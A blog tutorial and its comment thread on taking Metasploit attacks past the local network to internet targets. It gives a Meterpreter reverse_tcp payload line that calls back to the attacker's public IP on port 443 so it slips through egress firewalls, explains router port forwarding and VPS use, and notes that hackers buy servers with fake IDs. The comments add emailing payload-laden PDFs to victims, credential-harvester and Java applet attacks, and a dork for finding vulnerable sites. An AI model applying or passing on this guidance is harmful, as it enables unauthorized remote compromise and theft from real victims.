Sorry :(
Our Image server is on a maintenance now,
You will not see the image correctly
please check back shortly. . .
How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic
Type : Tutorial
Level : Medium, Advanced
A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network 
.
Requirement :
1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)
3. Cloud Server(I haven't try this ) e.g : Amazon
4. Internet With Public IP
5. You can control router by yourself
Step-By-Step :
1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY)
2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.
3. Cloud server –> I haven't trying this…maybe someone can share
4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.
5. Control router by ourselves to redirect incoming connection or outgoing connection.
Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :
Legends(Attacker) :
- Attacker1 use local IP address –> 192.168.8.8
- Attacker1 have public IP address –> 73.67.123.85
- Attacker1 can control his router to redirect any incoming/outgoing traffic.
- Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.
Legends(Victim) :
- Victim1 have local IP address –> 192.168.1.2
- Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection
- Victim2 connected directly to internet with IP address –> 98.87.112.89
How to Attack? :
Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :
TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website
TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
etc(you can scan it first but be careful).
From the information above, usually attacker can create some payload and options like this :
set payload windows/meterpreter/reverse_tcp set lhost 73.67.123.85 set lport 443
When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.
You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding
Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….
Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.
You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise
Hope it's useful for you.
If information I wrote here was wrong, let me know I'll correct it
|
|
29 Comments »
RSS feed for comments on this post. TrackBack URL
[...] You also can learn how to implement this method to attack over the internet, but please read my previous tutorial about the logic how to attack network outside LAN / Attack WAN. [...]
There is a related and interesting blog post on the Netresec blog about how the meterpreter reverse_https backdoors can be detected.
http://www.netresec.com/?page=Blog&month=2011-07&post=How-to-detect-reverse_https-backdoors
[...] more : http://vishnuvalentino.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-… 3.585242 98.675598 Share this:ShareFacebookTwitterStumbleUponRedditDiggPrintEmailLinkedInLike [...]
A demo video of this would be helpful.
#Xt
sorry for that, but you can do it yourself when you have the requirement I describe above
V4L i lik ur tuts…
I,ve a problem! My ISP provides a dynamic Wan ip so….i created account in no-ip and creatd a host…& installed DUC their free client program…then i portforwd my router to my Lan ip…..DO I HAVE TO PROVIDE THE NO- IP HOSTNAME IN LHOST IN METASPLOIT PAYLOAD SETTING…PLS XPLAIN HOW TO USE NO-IP HOST NAME INORDER TO PROPERLY GET MY METERPRETER REVERSE CONNECTION!!! PLS HELP V4L!
Nice info master, mantap.
[...] Tutorial Hack Jcow 4.2 dengan Metasploit 10.10.2011, Hacking, Linux, Security, Social Network, Tutorial, by Ops_NH. Pada contoh yang ada dibawah ini, korban menggunakan IP : 192.168.8.94… Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internetklik disini. [...]
Hi,
nice tutorial!
I was just wondering, if you don't have a static IP. Couldn't you just use no-ip(http://www.no-ip.com/) to create a hostname to point to your dynamic IP?
And then set localhost like this: set lhost <yourhostname>
Bind the payload to an PDF file, and mail it to a victim
Do you think this is posible?
#Hitch4000
Yep it’s possible
I’ve already wrote it here and here
[...] Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94… Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini) [...]
Bro How To Setup VPN ? :@
bRo Just Ek Bat BAtado Ke Port Forwarding Ke Liye Jo Apne tarika Diya He Isme Jo Ip he Wo Router Ki Ip He yA Host Ip He ?
#Rijju
Maybe 1st you can see the explanation about VPN here http://en.wikipedia.org/wiki/Virtual_private_network, because VPN and VPS is something totally different.
If you ask about VPN, you can use program like TOR, HotSpot Shield, OpenVPN, etc…
but if you ask about VPS, you can ask further to your hosting provider about how to set it up(fyi:it’s not a free service you should pay monthly fee).
[...] http://vishnuvalentino.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-… [...]
Do u have to use backtrack to hack a remote pc ? I only have metaspolit with armitage. can u use just this instead? will it work on windows 7???
#Papgaur
You also can use it in Windows, afaik there’s metasploit in Windows…but if you use Linux(I’m using Backtrack) it will be more simple and easier. I’m suggest using Backtrack because this distro already designed to do computer hacking / pentest.
hey bro how to OPEN closed port m using USB DONGLE nd my ISP has BLOCKED ALL PORTS.so when i pratice ur attack in my lab i didn't get successfull due to closed ports .
one more thing how to use metasploit to hack web server . and web application give me ny tutorial
#Mohit
usually an ISP server will not block all of your port, but they will filter it. If you use USB dongle, it just affect your PC, not a whole network.
you need to find which port are open both victim & attacker (usually port 80, 443, etc)
Sir how to install VPS server….?
#sivaraaj
the most easy way you can buy an internet packet from your provider with public ip address…
you should buy it, then you can install it…
[...] Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94… Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini) [...]
I managed to configure a DNS server so that the external client use my DNS server but when the client enters into facebook giousto dns not resolve the false one.
How to use a dns sever CENTOS I miss something in the configuration of named.conf? I hope it can help
#orsettobubu
hmm…yep I think maybe you miss something in your configuration…
yup ok**banget untuk kami kaum yg tertidas**untuk pedidikan**
hey im a big fan of your blog and hats off to your tutorials
ok let me get to the point
i was trying to port forward my router so that i can use metasploit over the net but unfortunately it isnt working i dont know why
here are the settings which i used:-
in the port forwarding tab i have given my local ip address:192.168.1.x
with the port no:443
i have configured the network of my virtual machine to bridge
in back track i have configured it to use a static ip: 192.168.1.x(which i have configured in the router in the port forwarding tab)
DNS1:8.8.8.8
DNS2:8.8.4.4
after doing all this and setting a credential harvester method i gave my ip to my friend(192.168.1.x)
but nothing , he said it gave a 404 error
i dont know why
please help me out in doing port forwarding stuff if im doing it wrong
peace
#piyush
if you give that ip 192.168.1.x to your friend, of course won’t work..it’s local port…you should give your router address..
on your router usually there’s forwarding port…so when someone open ip like : 121.23.45.72:9999 the router should redirect that request to your local ip address.
thanx for your lightning fast comment bro…
i have done accordingly you said but when i use the java applet attack method it ask me if in using a NAT i type "yes"
then it says IP address of the set web server i type "my local IP"
then it says is your payload handler on diffrent IP i type "no"
after all that it says failed to blind to 192.168.1.4:80
i dont know why ?
please help
and im a NOOB please do elaborate
thanx
#piyush
ip address of set web server should be your router, your router will forward every incoming packet that come to port 80 to your local IP.